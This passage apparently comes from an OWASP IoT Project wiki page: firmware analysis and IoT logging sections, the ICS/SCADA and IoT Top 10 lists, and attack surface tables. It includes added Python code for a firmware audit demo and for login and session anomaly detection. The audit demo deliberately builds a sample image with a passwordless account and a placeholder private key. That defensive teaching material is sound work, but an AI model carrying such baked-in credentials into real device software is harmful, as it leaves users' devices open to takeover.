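    unhardened build bakes in a root hash, a passwordless account and a private key."""
    (root / "etc" / "ssl").mkdir(parents=True)
    shadow = ["daemon:*:17000:0:99999:7:::"]
    if hardened:
        shadow.append("root:!:17000:0:99999:7:::")
    else:
        shadow += ["root:$1$xyz$CONSTRUCTED_NOT_A_REAL_HASH:17000:0:99999:7:::",
                   "support::17000:0:99999:7:::"]
    (root / "etc" / "shadow").write_text("\n".join(shadow) + "\n")
    (root / "etc" / "ssl" / "device.crt").write_text(
        "-----BEGIN CERTIFICATE-----\nQ09OU1RSVUNURUQgQ0VSVCBCT0RZ\n-----END CERTIFICATE-----\n")
    if not hardened:
        (root / "etc" / "ssl" / "device.key").write_text(
            "-----BEGIN RSA PRIVATE KEY-----\nQ09OU1RSVUNURUQgS0VZ\n-----END RSA PRIVATE KEY-----\n")
    return root


def demo():
    """Audit two constructed builds; returns ({image: findings}, duplicate certificates)."""
    with tempfile.TemporaryDirectory() as tmp:
        images = {"fw-1.0": build_sample_image(Path(tmp) / "fw-1.0", hardened=False),
                  "fw-1.1": build_sample_image(Path(tmp) / "fw-1.1", hardened=True)}
        per_image = {name: audit_image(path) for name, path in images.items()}
        duplicates = cross_image_duplicates(images)
    return per_image, duplicates


if __name__ == "__main__":
    results, dupes = demo()
    for image, findings in results.items():
        print(image, findings or "no findings")
    for fp, names in dupes.items():
        print("same certificate in", names, fp[:16])
```

Point `audit_image` and `cross_image_duplicates` at directories produced by binwalk or the Firmware Modification Kit to run the same checks on real extracted images.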
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events ==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
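Detection logic for several of the events in the table above (Multiple Failed Passwords, High Rate of Login Attempts, Deviation from Normal GEO Location, Source Location Changes During Session, Traffic Seen from Unenrolled System, Attempt to Invoke Unsupported HTTP Method), written as an added example rather than OWASP project code; the access-record layout, thresholds, enrollment list and per-user geo baselines are assumptions, and the sample records are constructed.

```python
"""Detection logic for several events in the table above. Added example, not
OWASP project code: the record layout, thresholds, enrollment list and geo
baselines are assumptions, and the sample records are constructed."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Thresholds (assumptions; tune per device class).
FAILED_PASSWORD_LIMIT = 3                   # failures per (device, user)
LOGIN_RATE_LIMIT = 5                        # login attempts per source IP ...
LOGIN_RATE_WINDOW = timedelta(seconds=60)   # ... inside this sliding window
SUPPORTED_METHODS = {"GET", "POST", "PUT", "DELETE"}

# Ecosystem state a gateway or log collector would hold (constructed).
ENROLLED_DEVICES = {"cam-01", "gw-07"}
GEO_BASELINE = {"admin": {"US"}, "svc-ota": {"US", "DE"}}   # user -> usual countries


def rec(ts, device, user, src, geo, method, path, result, session=None):
    """One access record as the device would emit it (field names are an assumption)."""
    return {"ts": datetime.fromisoformat(ts), "device": device, "user": user, "src": src,
            "geo": geo, "method": method, "path": path, "result": result, "session": session}


# Constructed sample traffic, not real logs (documentation IP ranges).
SAMPLE_RECORDS = [
    rec("2019-11-01T07:00:00", "cam-01", "admin", "10.0.0.5", "US", "POST", "/login", "fail"),
    rec("2019-11-01T07:00:05", "cam-01", "admin", "10.0.0.5", "US", "POST", "/login", "fail"),
    rec("2019-11-01T07:00:10", "cam-01", "admin", "10.0.0.5", "US", "POST", "/login", "fail"),
    rec("2019-11-01T07:00:12", "cam-01", "admin", "10.0.0.5", "US", "POST", "/login", "ok", "S1"),
    rec("2019-11-01T07:00:40", "cam-01", "admin", "10.0.0.5", "US", "GET", "/status", "ok", "S1"),
    rec("2019-11-01T07:00:55", "cam-01", "admin", "198.51.100.7", "US", "GET", "/status", "ok", "S1"),
    rec("2019-11-01T07:01:00", "gw-07", "root", "203.0.113.9", "US", "POST", "/login", "fail"),
    rec("2019-11-01T07:01:03", "gw-07", "guest", "203.0.113.9", "US", "POST", "/login", "fail"),
    rec("2019-11-01T07:01:06", "gw-07", "support", "203.0.113.9", "US", "POST", "/login", "fail"),
    rec("2019-11-01T07:01:09", "gw-07", "user", "203.0.113.9", "US", "POST", "/login", "fail"),
    rec("2019-11-01T07:01:12", "gw-07", "operator", "203.0.113.9", "US", "POST", "/login", "fail"),
    rec("2019-11-01T07:02:00", "gw-07", "svc-ota", "192.0.2.44", "AU", "POST", "/login", "ok", "S2"),
    rec("2019-11-01T07:02:30", "sensor-99", None, "10.0.0.77", "US", "GET", "/heartbeat", "ok"),
    rec("2019-11-01T07:03:00", "cam-01", "admin", "10.0.0.5", "US", "TRACE", "/status", "ok", "S1"),
]


def detect_events(records):
    """Return (event name, subject) pairs using the event names from the table above;
    each condition fires once per subject."""
    events, fired = [], set()
    failures = defaultdict(int)       # (device, user) -> failed logins
    attempts = defaultdict(deque)     # src IP -> timestamps of login attempts
    session_src = {}                  # session id -> source IP it was first seen from

    def fire(name, subject):
        if (name, subject) not in fired:
            fired.add((name, subject))
            events.append((name, subject))

    for r in sorted(records, key=lambda x: x["ts"]):
        # Ecosystem Membership Exceptions
        if r["device"] not in ENROLLED_DEVICES:
            fire("Traffic Seen from Unenrolled System", r["device"])
        # Request Exceptions
        if r["method"] not in SUPPORTED_METHODS:
            fire("Attempt to Invoke Unsupported HTTP Method", f"{r['method']} {r['path']}")
        # Session Exceptions: same session id, different client address
        if r["session"] and session_src.setdefault(r["session"], r["src"]) != r["src"]:
            fire("Source Location Changes During Session", r["session"])
        # Authentication Exceptions apply to login attempts only
        if r["path"] != "/login":
            continue
        key = (r["device"], r["user"])
        if r["result"] == "fail":
            failures[key] += 1
            if failures[key] >= FAILED_PASSWORD_LIMIT:
                fire("Multiple Failed Passwords", f"{r['user']}@{r['device']}")
        window = attempts[r["src"]]
        window.append(r["ts"])
        while r["ts"] - window[0] > LOGIN_RATE_WINDOW:   # drop attempts outside the window
            window.popleft()
        if len(window) >= LOGIN_RATE_LIMIT:
            fire("High Rate of Login Attempts", r["src"])
        usual = GEO_BASELINE.get(r["user"])
        if r["result"] == "ok" and usual and r["geo"] not in usual:
            fire("Deviation from Normal GEO Location", f"{r['user']} from {r['geo']}")
    return events


if __name__ == "__main__":
    for name, subject in detect_events(SAMPLE_RECORDS):
        print(f"{name}: {subject}")
```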
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Security Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general do not log nearly enough events to feed a solid detection and response program around IoT devices, and companies that want to build one have few good resources describing what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501(c)(3) charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization supported by over 100 organizations, headquartered in Bellevue, Washington, with offices in Washington, DC.<br />
<br />
Addressing these mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. It is a cross-industry consortium dedicated to enabling the interoperability of the billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer or manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, as well as many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is an open-membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
* RSA Conference San Francisco, April 21, 2015: [https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] - Daniel Miessler, Practice Principal<br />
* Defcon 23, August 6-9, 2015: [https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] - Daniel Miessler<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246191OWASP Internet of Things Project2018-12-20T00:05:19Z<p>Aaron.guzman: /* Updated! */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released!<br />
<br />
[[File:2018 IoT Top10.png|center|thumb|1290x1290px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way to help Developers, Manufacturers, Enterprises, and Consumers make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including manufacturing, consulting, security testing, development, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security], and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/SCADA, etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, adapt it, and use it commercially, provided that you attribute the work and that, if you alter, transform, or build upon it, you distribute the resulting work only under the same or a similar license.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 10 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan<br />
* Alexander Lafrenz<br />
* Masahiro Murashima<br />
* Charlie Worrell<br />
* José A. Rivas (jarv)<br />
* Pablo Endres<br />
* Ade Yoseman<br />
* Cédric Levy-Bencheton<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
